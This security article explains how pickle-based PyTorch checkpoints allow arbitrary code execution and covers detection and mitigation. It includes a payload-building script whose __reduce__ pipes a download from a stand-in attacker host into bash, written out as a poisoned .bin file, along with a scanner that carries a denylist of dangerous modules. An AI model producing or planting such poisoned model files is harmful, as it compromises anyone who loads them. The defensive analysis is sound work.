Arbitrary Code Execution via PyTorch Pickle Serialization
The historical reliance on Python's pickle module for serializing PyTorch models (pytorch_model.bin) represents one of the most severe supply chain vulnerabilities in the machine learning ecosystem. Pickle is not a declarative data format like JSON; a pickle stream is a sequence of instructions for a small, imperative, stack-based virtual machine.
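When a framework calls torch.load() without restricting the unpickler, the Pickle Virtual Machine (PVM) interprets that opcode sequence, and the sequence can import and call arbitrary Python functions. PyTorch 2.6 and later default torch.load() to weights_only=True, which limits the unpickler to an allowlist of types, but older releases and any call that passes weights_only=False remain exposed.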
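To make the "program, not data" point concrete, here is a minimal sketch that uses the standard-library pickletools module to list the opcodes behind an ordinary dictionary. The dictionary contents are made up for illustration, and the stream is only inspected, never loaded.

```python
import pickle
import pickletools

# Even plain data is serialized as a sequence of opcodes for the pickle VM.
# The dictionary below is an arbitrary illustrative value.
stream = pickle.dumps({"layer": "fc1", "dim": 128}, protocol=4)

# genops() walks the stream without executing it and yields
# (opcode, argument, byte position) triples.
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(stream)]
print(opcode_names)
```

The list starts with PROTO and ends with STOP; everything in between pushes values onto the PVM stack or combines them into the final object.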
Exploiting the __reduce__ Protocol
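The pickle protocol uses the __reduce__ magic method to define how complex objects should be reconstructed. The method returns a callable together with a tuple of arguments, and the unpickler calls that callable with those arguments during loading. An attacker can therefore construct a malicious class where __reduce__ returns a callable such as os.system or subprocess.Popen alongside a tuple of arguments (the malicious payload).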
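The mechanism can be observed safely with a harmless callable. The sketch below is an illustration only: the class name SortOnLoad is hypothetical, and the built-in sorted stands in for whatever function an attacker would choose.

```python
import pickle


class SortOnLoad:
    """Hypothetical class whose __reduce__ names a harmless callable."""

    def __reduce__(self):
        # (callable, args): the unpickler will call sorted([3, 1, 2]) at load time.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(SortOnLoad())

# Loading does not rebuild a SortOnLoad instance; it returns whatever
# the callable returned.
restored = pickle.loads(blob)
print(type(restored).__name__, restored)
```

The loaded value is the return value of the callable, not an instance of the original class, which is why swapping in os.system turns deserialization into command execution.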
Payload Construction
import os
import pickle


class MaliciousTensorObject:
    def __reduce__(self):
        # The unpickler calls os.system(cmd) when the file is deserialized
        cmd = "curl -s http://attacker.com/shell.sh | bash"
        return (os.system, (cmd,))


# Write the payload to a file with the .bin extension used for PyTorch checkpoints
with open("poisoned_model.bin", "wb") as f:
    pickle.dump(MaliciousTensorObject(), f)
When a victim downloads this .bin file and loads it, the PVM resolves os.system through the GLOBAL opcode (STACK_GLOBAL in pickle protocol 4 and later), and the REDUCE opcode then calls it with the supplied shell command. The downloaded script, for example a reverse shell, runs with the privileges of the process loading the model.
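The import-then-call opcode pair can be inspected without loading anything. The following sketch uses a harmless stand-in (math.sqrt) and a hypothetical class name, and compares the opcode names emitted under pickle protocol 2 and protocol 4; it assumes only the standard library.

```python
import math
import pickle
import pickletools


class SqrtOnLoad:
    """Hypothetical stand-in: same shape as the payload, harmless callable."""

    def __reduce__(self):
        return (math.sqrt, (16.0,))


def opcode_names(protocol):
    # Serialize only; the stream is disassembled, never loaded.
    stream = pickle.dumps(SqrtOnLoad(), protocol=protocol)
    return [opcode.name for opcode, arg, pos in pickletools.genops(stream)]


proto2_ops = opcode_names(2)
proto4_ops = opcode_names(4)
print("protocol 2:", proto2_ops)
print("protocol 4:", proto4_ops)
```

Protocol 2 names the callable with a single GLOBAL opcode, while protocol 4 pushes the module and attribute names as strings and resolves them with STACK_GLOBAL. In both cases REDUCE is the opcode that performs the call, so a detector needs to recognize both import forms.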
Mitigation: Static Bytecode Analysis
Standard antivirus (AV) engines and YARA rules frequently fail to detect these payloads because the bytecode can be heavily obfuscated, and because AV engines lack context regarding PVM opcode sequences.
Defending the ML supply chain requires specialized static analysis. Instead of executing the file, security tools must simulate the stack operations of the PVM to determine which callables the file would import and invoke. By integrating Veritensor into your artifact registry or CI/CD pipeline, you can automatically decompile and statically analyze legacy .bin files for dangerous imports (os, pty, socket) and block their deployment. The same pipeline can enforce a structural transition to the purely declarative .safetensors format.
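As a rough illustration of the static approach, and not a description of how any particular product works, the sketch below walks a pickle stream with pickletools.genops and reports the modules it would import, without ever loading it. The function names and the denylist are assumptions made for this example. The string tracking is a heuristic rather than a full stack simulation, so an obfuscated stream could evade it. Files written by recent versions of torch.save are zip archives with the pickle stored inside, so a real scanner would extract that member first; that step is omitted here.

```python
import os
import pickle
import pickletools

# Illustrative denylist, not exhaustive. os.system is pickled under the
# platform module name (posix or nt), so those are listed as well.
SUSPICIOUS_MODULES = {"os", "posix", "nt", "subprocess", "pty", "socket"}


def find_imports(stream):
    """Return (module, name) pairs the stream would import, without loading it."""
    imports = []
    recent_strings = []  # heuristic stand-in for the PVM stack
    for opcode, arg, _pos in pickletools.genops(stream):
        if opcode.name in ("GLOBAL", "INST"):
            # genops reports the argument as "module name".
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Module and attribute were pushed as the two preceding strings.
            if len(recent_strings) >= 2:
                imports.append((recent_strings[-2], recent_strings[-1]))
            else:
                imports.append(("<unknown>", "<unknown>"))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return imports


def flag_suspicious(stream):
    """Keep only imports whose top-level module is on the denylist."""
    return [
        (module, name)
        for module, name in find_imports(stream)
        if module.split(".")[0] in SUSPICIOUS_MODULES
    ]


class EchoOnLoad:
    """Hypothetical test object; it is serialized here but never loaded."""

    def __reduce__(self):
        return (os.system, ("echo scanned",))


suspicious = flag_suspicious(pickle.dumps(EchoOnLoad()))
benign = flag_suspicious(pickle.dumps({"weights": [0.1, 0.2]}))
print("suspicious:", suspicious)
print("benign:", benign)
```

A denylist like this is easy to bypass, so production scanners tend to pair it with an allowlist of expected imports and treat any unresolved STACK_GLOBAL as a failure.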